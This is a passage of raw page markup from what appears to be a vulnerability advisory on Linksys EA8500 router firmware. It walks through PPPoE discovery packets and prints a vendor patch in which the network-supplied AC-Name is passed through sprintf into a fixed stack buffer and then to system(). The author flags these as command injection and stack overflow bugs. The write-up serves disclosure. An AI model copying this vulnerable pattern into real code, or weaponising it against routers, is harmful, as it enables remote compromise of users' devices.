class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">AC<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bebcb53c10b32769a8661c36a45d8720<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<p><u>Step 4: CONFIRM<\/u> &#8211; The DSL-AC confirms the request (PADR) by sending a PPPoE Active Discovery Session-confirmation (PADS), a Session-ID is sent along.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7cb0325935864\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Frame 4: 60 bytes on wire (480 bits), 60 bytes captured (480 bits)  Ethernet II, Src: Unispher_a4:10:be (00:90:1a:a4:10:be), Dst: 20:28:18:a0:a9:d2 (20:28:18:a0:a9:d2)  PPP-over-Ethernet Discovery      0001 &#8230;. = Version: 1      &#8230;. 0001 = Type: 1      Code: Active Discovery Session-confirmation (PADS) (0x65)      Session ID: 0x18b2      Payload Length: 4      PPPoE Tags  \/* session established *\/<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb0325935864-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb0325935864-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb0325935864-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb0325935864-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb0325935864-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb0325935864-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb0325935864-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb0325935864-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb0325935864-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb0325935864-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb0325935864-1\"><span class=\"crayon-i\">Frame<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">60<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bytes <\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-e\">wire<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">480<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bits<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">60<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bytes <\/span><span class=\"crayon-e\">captured<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">480<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bits<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb0325935864-2\"><span class=\"crayon-e\">Ethernet <\/span><span class=\"crayon-v\">II<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Src<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Unispher_a4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">be<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">90<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">1a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">be<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Dst<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a9<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">d2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">28<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">18<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">a9<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">d2<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb0325935864-3\"><span class=\"crayon-v\">PPP<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">over<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Ethernet <\/span><span class=\"crayon-i\">Discovery<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb0325935864-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0001<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Version<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb0325935864-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0001<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb0325935864-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Code<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Active <\/span><span class=\"crayon-e\">Discovery <\/span><span class=\"crayon-v\">Session<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">confirmation<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">PADS<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x65<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb0325935864-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Session <\/span><span class=\"crayon-v\">ID<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18b2<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb0325935864-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Payload <\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb0325935864-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">PPPoE <\/span><span class=\"crayon-v\">Tags<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb0325935864-10\"><span class=\"crayon-c\">\/* session established *\/<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<p><u>Step 5: Termination<\/u> &#8211; In order to terminate the PPPoE session anyon of the two peer can send a PPPoE Active Discovery Termination (PADT).<\/p>\n<p><strong>Vulnerable Code<\/strong><br \/> This report is based on the EA8500 firmware but all the other versions basically share the same firmware code and patchset.<\/p>\n<p><u>Firmware:<\/u> EA8500_v1.1.4.171079_SP6.tar.gz<br \/> <u>Patchset:<\/u> EA8500_v1.1.4.171079_SP6.tar.gzEA8500_v1.1.4.171079_SP6srcppp<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7cb3832650077\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">     ppp-2.4.4_001_build.patch      ppp-2.4.4_002_handle_multiple_l2tp_packets.patch      ppp-2.4.4_003_mru.patch      ppp-2.4.4_004_rp-pppoe_service_name.patch      ppp-2.4.4_005_use_servicename_from_pado.patch                 ppp-2.4.4_006_comment.patch      ppp-2.4.4_007_fix_garbage_servicename.patch      ppp-2.4.4_008_get_acname_sessionid.patch                \/\/!# &lt;- introduces vulnerabilities      ppp-2.4.4_009_get_ppp_auth_proto.patch      ppp-2.4.4_010_ppp_l2tp_plugin.patch      ppp-2.4.4_011_ppp_pptp_plugin.patch      ppp-2.4.4_012_chap_msv2_reserved_field.patch      ppp-2.4.4_013_ppp_clamp_mtu.patch      ppp-2.4.4_015_ipv6cp_rejected_pppoe_on_demand.patch<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb3832650077-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb3832650077-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb3832650077-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb3832650077-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb3832650077-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb3832650077-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb3832650077-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb3832650077-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb3832650077-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb3832650077-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb3832650077-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb3832650077-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb3832650077-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb3832650077-14\">14<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb3832650077-1\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4_001_build.patch<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb3832650077-2\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4_002_handle_multiple_l2tp_packets.patch<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb3832650077-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4_003_mru.patch<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb3832650077-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4_004_rp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">pppoe_service_name<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">patch<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb3832650077-5\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4_005_use_servicename_from_pado.patch<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb3832650077-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4_006_comment.patch<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb3832650077-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4_007_fix_garbage_servicename.patch<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb3832650077-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4_008_get_acname_sessionid.patch<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/!# &lt;- introduces vulnerabilities<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb3832650077-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4_009_get_ppp_auth_proto.patch<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb3832650077-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4_010_ppp_l2tp_plugin.patch<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb3832650077-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4_011_ppp_pptp_plugin.patch<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb3832650077-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4_012_chap_msv2_reserved_field.patch<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cb3832650077-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4_013_ppp_clamp_mtu.patch<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cb3832650077-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4_015_ipv6cp_rejected_pppoe_on_demand.patch<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0013 seconds] -->  <\/p>\n<p><u>Vulnerable file:<\/u> ppp-2.4.4_008_get_acname_sessionid.patch<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7cb6774754989\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> diff -Nur pppd-old\/pppd\/plugins\/rp-pppoe\/discovery.c pppd-new\/pppd\/plugins\/rp-pppoe\/discovery.c      &#8212; pppd-old\/pppd\/plugins\/rp-pppoe\/discovery.c  2012-02-07 18:35:27.000000000 +0800      +++ pppd-new\/pppd\/plugins\/rp-pppoe\/discovery.c  2012-02-13 14:12:00.093953000 +0800      @@ -114,13 +114,17 @@           struct PacketCriteria *pc = (struct PacketCriteria *) extra;           PPPoEConnection *conn = pc-&gt;conn;           int i;      &#8211;      +   char cmd[256];                                                      \/\/!# 256bytes fixed stack buffer      +   memset(cmd,0,sizeof(cmd));                                                     switch(type) {           case TAG_AC_NAME:          pc-&gt;seenACName = 1;          if (conn-&gt;printACNames) {              printf(&#8220;Access-Concentrator: %.*sn&#8221;, (int) len, data);          }      +   \/*add by taliang@cisco.com @13\/02 2012 for tr69*\/      +   sprintf(cmd, &#8220;sysevent set wan_pppoe_acname %.*s&#8221;,(int)len, data);  \/\/!# VU#2 stack buffer overwrite sprintf      +   system(cmd);                                                        \/\/!# VU#1 shell command injection          if (conn-&gt;acName &amp;&amp; len == strlen(conn-&gt;acName) &amp;&amp;              !strncmp((char *) data, conn-&gt;acName, len)) {              pc-&gt;acNameOK = 1;      @@ -514,6 +518,8 @@           PPPoEPacket packet;           int len;        +   char cmd[256];      +   memset(cmd, 0, sizeof(cmd));           do {          if (BPF_BUFFER_IS_EMPTY) {              tv.tv_sec = timeout;      @@ -569,6 +575,9 @@             \/* Don&#8217;t bother with ntohs; we&#8217;ll just end up converting it back&#8230; *\/           conn-&gt;session = packet.session;      +    \/*add by taliang@cisco.com @13\/02 2012 for tr69*\/      +    sprintf(cmd, &#8220;sysevent set wan_pppoe_session_id %d&#8221;,(int) ntohs(conn-&gt;session));      +    system(cmd);             syslog(LOG_INFO, &#8220;PPP session is %d&#8221;, (int) ntohs(conn-&gt;session));<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cb6774754989-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cb6774754989-32\">32<\/div>\n<div class=\"crayon-num\" 